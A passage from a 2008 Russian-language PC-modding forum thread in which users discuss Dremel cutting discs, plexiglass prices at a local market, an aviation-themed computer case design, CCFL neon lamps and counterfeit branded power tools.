- износ существенно меньше. проделал работу, которая привела бы к стачиванию примерно половины старого диска. новый диск уменьшился менее чем на толщину волоса
- при вырезании изогнутых линий, диск чувствительнее к "закусыванию", лучше сильно его в материал не погружать
В целом впечатления положительные, о покупке не пожалел. Думаю, на то, чтобы хорошо поиздеваться над корпусом, хватит 1, максимум 2 дисков
Jemba-Jemba
09-08-2008, 21:44
Если есть вопросы - готов ответить :пиво:
sergemi
11-08-2008, 13:37
Jemba-Jemba,
спасибо за наводку. :класс:
Заскочу и я к ним отовариться.
Jemba-Jemba
11-08-2008, 14:03
Все не родные насадки очень рекоммендую использовать аккуратно и с умом. Все-так, не родные :)
Crecker
11-08-2008, 15:07
Присоединяюсь к благодарности :)
А по поводу оргстекла кто то что то знает? Где, почём и каких размеров есть?
Jemba-Jemba
11-08-2008, 15:12
Присоединяюсь к благодарности :)
А по поводу оргстекла кто то что то знает? Где, почём и каких размеров есть?
На Героев Труда, возле ЮСИ, т.н. круглый рынок, крайний к юси ряд. Листы метр на метр в пленке с двух сторон, толщина 2мм = 120грн, 3мм = 180грн. Единственное месте где нашел, на барабане не смог найти
Crecker
11-08-2008, 15:22
Както дороговато. 2мм тонковато для стенки корпуса, а 3мм наверно ещё дороже. :(
Хочу всётаки продолжить авиационную тему своего корпуса, есть идея сделать крышку слотов 5.25 под фонарь самолёта, а под ней аналоговые амперметры и реобас с тумблерами и регуляторами, будет некоторое подобие кабины пилота с приборной панелью. Как забабахать бока ещё не придумал. Друг вообще посоветовал втулить туда ту хрень которая в машине дворниками управляет что бы она корпус приподымала и опускала, имитируя темсамым полёт :D я же ещё незнаю стоит ли так углублятся :) Чувствую что нужно купить какой то хлам для временно расположения в нём ПК пока основной корпус будет на "СТО"
Jemba-Jemba
11-08-2008, 15:27
Както дороговато. 2мм тонковато для стенки корпуса, а 3мм наверно ещё дороже. :(
2 мм = 120 грн
3 мм = 180 грн
Дороговато конечно. Но зато плекс хороший, гладкий без царапин. Да и хватит на много "окошек". Я взял 2мм, не думаю что этого не хватит. разве что, если очень большая площадь окна будет. Да и то, думаю, хватит
Crecker
11-08-2008, 15:29
2 мм = 120 грн
3 мм = 180 грн
както провтыкал :rolleyes:
Jemba-Jemba
11-08-2008, 16:12
Хочу всётаки продолжить авиационную тему своего корпуса, есть идея сделать крышку слотов 5.25 под фонарь самолёта, а под ней аналоговые амперметры и реобас с тумблерами и регуляторами, будет некоторое подобие кабины пилота с приборной панелью. Как забабахать бока ещё не придумал
конечно, в самый раз было бы прилепить на бок полуцилиндр, с вставленным смотрящим вперед LED кулером и решеткой a-la турбина самолета :) Но вряд ли это положительно повлияет на аэродинамику в корпусе :)
Crecker
11-08-2008, 16:39
Цилиндр не годится, так как в корпусе уже есть турбина (кстати приводится в движение стоящим за ней куллером, точнее потоком воздуха который этот куллер создаёт) Покатит только создание внешнего вида турбореактивного двигателя. Самый простой способ это нарисовать при помощи аэрографа двигатель на боку корпуса, только нарисовать типа он трёхмерный, а сзади сделать сопло и вставить туда кулер красного цвета, можно ещё лоскуток приклеить что бы колебался от выхлопа корпуса тем самым имитируя пламя :) но это уже мелочи, вот как всётаки изобразить двигатель сбоку...
Jemba-Jemba
11-08-2008, 16:43
но это уже мелочи, вот как всётаки изобразить двигатель сбоку...
Без аэрографа, думаю, никак
Crecker
11-08-2008, 16:52
выход есть всегда, даже если тебя съели. :) Можно впринципе приклеить фрагмент трубы, примерно 1/6 от её окружности, типа двигатель. А к нему подключить кучу трубок, чисто для эфектности внешнего вида
Jemba-Jemba
11-08-2008, 16:55
выход есть всегда, даже если тебя съели. :) Можно впринципе приклеить фрагмент трубы, примерно 1/6 от её окружности, типа двигатель. А к нему подключить кучу трубок, чисто для эфектности внешнего вида
Ну да внутрь пару неонок на холодном катоде, длиной 30 см. светить будут очень-очень
Crecker
12-08-2008, 12:03
Кстати неонками я ещё не пользовался. Сама лампочка стоит кажетсо 30 рубчикоф. А сколько стоит питальник для неё или какой у неё там интерфейс ещё бывает?
Rimlyanin
12-08-2008, 13:30
Кстати неонками я ещё не пользовался. Сама лампочка стоит кажетсо 30 рубчикоф. А сколько стоит питальник для неё или какой у неё там интерфейс ещё бывает?комповые неонки идут сразу с молексом :)
Если есть необходимость, могу отгрузить сколько надо ламп Sunbeam.
http://www.sunbeamtech.com/PRODUCTS/CCFL.HTML
Лампа или две в зависимости от комплекта, с инвертором, липучкой для крепления ламп и инвертера и проводами. Лампы хороши тем, что легко ставятся снимаются, т.к. каждая лампа отдельно подключается к своему разъему на инвертере
Crecker
12-08-2008, 20:37
И почём сие у тебя? Только после отпуска буду брать, а то в отпуске кагбы деньги надо :)
Jemba-Jemba
12-08-2008, 21:06
И почём сие у тебя? Только после отпуска буду брать, а то в отпуске кагбы деньги надо :)
Одинарные были по 33, двойные по 43, плюс-минус копейки. Буду в офисе посмотрю точнее
sergemi
17-08-2008, 20:10
Был вчера на радио рынке на м. "Героев труда" видал там на два места разложенные дремеля и насадки к ним. Пофтыкал минут 5 - продавца так и не дождался и побежал дальше по делам.
Думаю еще зайти туда после отпуска.
Выбор большой.
Располагаеться в начале второго справа ряда если стоять спиной к трамвайной остановке. Ну там его видно. Место большое.
Jemba-Jemba
18-08-2008, 00:58
Был вчера на радио рынке на м. "Героев труда" видал там на два места разложенные дремеля и насадки к ним. Пофтыкал минут 5 - продавца так и не дождался и побежал дальше по делам.
Думаю еще зайти туда после отпуска.
Выбор большой.
Располагаеться в начале второго справа ряда если стоять спиной к трамвайной остановке. Ну там его видно. Место большое.
Главное почитайте сначала в интернете по поводу разных марок. Есть дешевые и приличные, типа Stern и пр., а есть барахло
Crecker
24-08-2008, 21:33
У меня товарищ торгует на барабашке эл. инструментом. Так он и stern и storm наклеит куда угодно. Даже БОШ есть :) только всё с одного китайского завода. Я у него дрель покупал так он посоветовал взять энергомаш, там хоть шестерни калёные :) Барыгам на базаре верить нельзя.
Jemba-Jemba
26-08-2008, 16:36
У меня товарищ торгует на барабашке эл. инструментом. Так он и stern и storm наклеит куда угодно. Даже БОШ есть :) только всё с одного китайского завода. Я у него дрель покупал так он посоветовал взять энергомаш, там хоть шестерни калёные :) Барыгам на базаре верить нельзя.
Может быть :) Но оригинальные Stern и тем более бошевский low-end инструмент Skil - нормальная покупка